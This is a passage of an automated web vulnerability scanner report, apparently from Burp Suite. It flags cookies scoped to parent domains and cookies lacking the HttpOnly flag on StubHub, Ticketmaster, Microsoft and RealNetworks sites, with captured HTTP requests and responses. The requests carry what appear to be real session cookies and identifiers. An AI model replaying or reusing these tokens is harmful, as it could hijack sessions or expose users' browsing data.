STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; TLTHID=EB2903FAB23510B2F895E17C95DDB51E; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119"}

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: Apache
Set-Cookie: TLTHID=EC5CA25EB23510B2D4AA9F0FE0F99B10; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:19:13 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:48 GMT
Vary: Accept-Encoding
Content-Length: 3630
Content-Type: text/css

...div.fsrwin {
border: 1px solid #ACACAC;
}

div.fsrwin div {
background: #FFFFFF none repeat scroll 0;
color: #4D4D4D;
font-family: Arial, Helvetica, Sans-Serif;
font-siz
...[SNIP]...

13.147. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /promotions/scratch/foresee_v1/foresee-surveydef.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-surveydef.js HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; fsr.a=1311100553264

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: TLTHID=EB2903FAB23510B2F895E17C95DDB51E; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:20:17 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:46 GMT
Vary: Accept-Encoding
Content-Length: 4318
Content-Type: text/javascript

FSR.surveydefs = [{
name: 'purchase',
invite: {
when: 'onentry',
delay: 0
},
pop: {
when: 'now'
},
criteria: {
sp: 32,
lf: 0
...[SNIP]...

13.148. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /resources/mojito/img/common/welcome_banner.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/mojito/img/common/welcome_banner.gif HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; TLTHID=E551BC2EB23510B2DFDBC89D01B99543; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.a=1311100546159

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:39 GMT
Server: Apache
Set-Cookie: TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; Path=/; Domain=.stubhub.com
Last-Modified: Wed, 29 Jun 2011 00:07:08 GMT
Accept-Ranges: bytes
Content-Length: 10048
Cache-Control: max-age=31536000
Expires: Wed, 18 Jul 2012 18:35:39 GMT
Content-Type: image/gif

GIF89a..D.......h.....Lt.......*Z..J|........................................................................!.......,......D......ydi.h..l..p,.tm.x..|....pH,....r.lv>...9.X...v..z...xL.....z.n....|N.
...[SNIP]...

13.149. http://www.ticketmaster.com/json/menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /json/menu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json/menu?domain_id=1&brand= HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in; CMPS=9/5zpXwS+lM9dMYILHV6iTnnjHn/JjrEoIh2Xg8PzFxlgu8vzRGTzw==; __cs_rr=1; MAJOR_CATEGORY=10001; foresee.alive=1311100560796; _E=%7B%22flags%22%3A%7B%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 4755
Date: Tue, 19 Jul 2011 18:36:28 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=238; path=/; domain=.ticketmaster.com
Set-Cookie: LANGUAGE=en-us; path=/; domain=.ticketmaster.com

{"10001":{"links":{"6":{"link":"/Matt-Nathanson-tickets/artist/861263","source_id":2,"position":6,"link_text":"Matt Nathanson"},"3":{"link":"/311-tickets/artist/759806","source_id":2,"position":3,"lin
...[SNIP]...

13.150. http://www.ticketmaster.com/json/search/genremenu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /json/search/genremenu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json/search/genremenu?dma_id=238 HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in; CMPS=9/5zpXwS+lM9dMYILHV6iTnnjHn/JjrEoIh2Xg8PzFxlgu8vzRGTzw==; __cs_rr=1; MAJOR_CATEGORY=10001; foresee.alive=1311100560796; _E=%7B%22flags%22%3A%7B%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Content-Type: text/javascript; charset=UTF-8
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Vary: Accept-Encoding
Content-Length: 735
Date: Tue, 19 Jul 2011 18:36:28 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=238; path=/; domain=.ticketmaster.com
Set-Cookie: LANGUAGE=en-us; path=/; domain=.ticketmaster.com

{"responseHeader":{"status":0,"QTime":7},"response":{"facet_counts":{},"numFound":1403,"docs":[],"start":0},"facet_counts":{"facet_fields":{"SportsBrowseGenre":["Basketball",11,"Boxing",3,"Football",1
...[SNIP]...

14. Cookie without HttpOnly flag set  previous  next
There are 168 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



14.1. http://c.microsoft.com/trans_pixel.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Please%20Verify%20your%20Location&fi=1&fv=10.3&ts=1311089274738&sr=1920x1200&bs=1065x723&ms.gsfxversion=7.6.9.0&ms.sup_cid=intercontact&ms.sup_cln=en-us&ms.sup_ct=gp&ms.sup_ln=en-us&ms.sup_sd=gn&MS.LOCALE=en&ms.ssversion=GSS7.0&ms.eventseqno=1 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/common/international.aspx?RDPATH=dm;en-us;select&target=assistance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078474665:ss=1311077969178

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.NumberOfVisits=2&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; domain=microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.VisitStartDate=07/19/2011 15:27:49&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Wed, 18-Jul-2012 15:27:49 GMT; path=/
Set-Cookie: MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Tue, 19 Jul 2011 15:27:49 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

14.2. http://investor.realnetworks.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://investor.realnetworks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 20:25:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A10%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:25:10 GMT;path=/
Set-Cookie: RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:25:10 GMT;path=/
Set-Cookie: RNWK_PREVIEW=;expires=Mon, 19-Jul-2010 20:25:10 GMT;path=/
Vary: Accept-Encoding
Content-Length: 25444


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...

14.3. http://investor.realnetworks.com/stockquote.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://investor.realnetworks.com
Path:   /stockquote.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stockquote.cfm HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NOMOBILE=0; sifrFetch=true; RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A13%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783; RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204; __utma=123436755.2082772103.1311107120.1311107120.1311107120.1; __utmb=123436755.1.10.1311107120; __utmc=123436755; __utmz=123436755.1311107120.1.1.utmcsr=realnetworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact-us.aspx

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 20:27:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A27%3A35%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
Set-Cookie: RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
Set-Cookie: RNWK_PREVIEW=;expires=Mon, 19-Jul-2010 20:27:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 27544


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...

14.4. http://rac.custhelp.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rac.custhelp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: rac.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
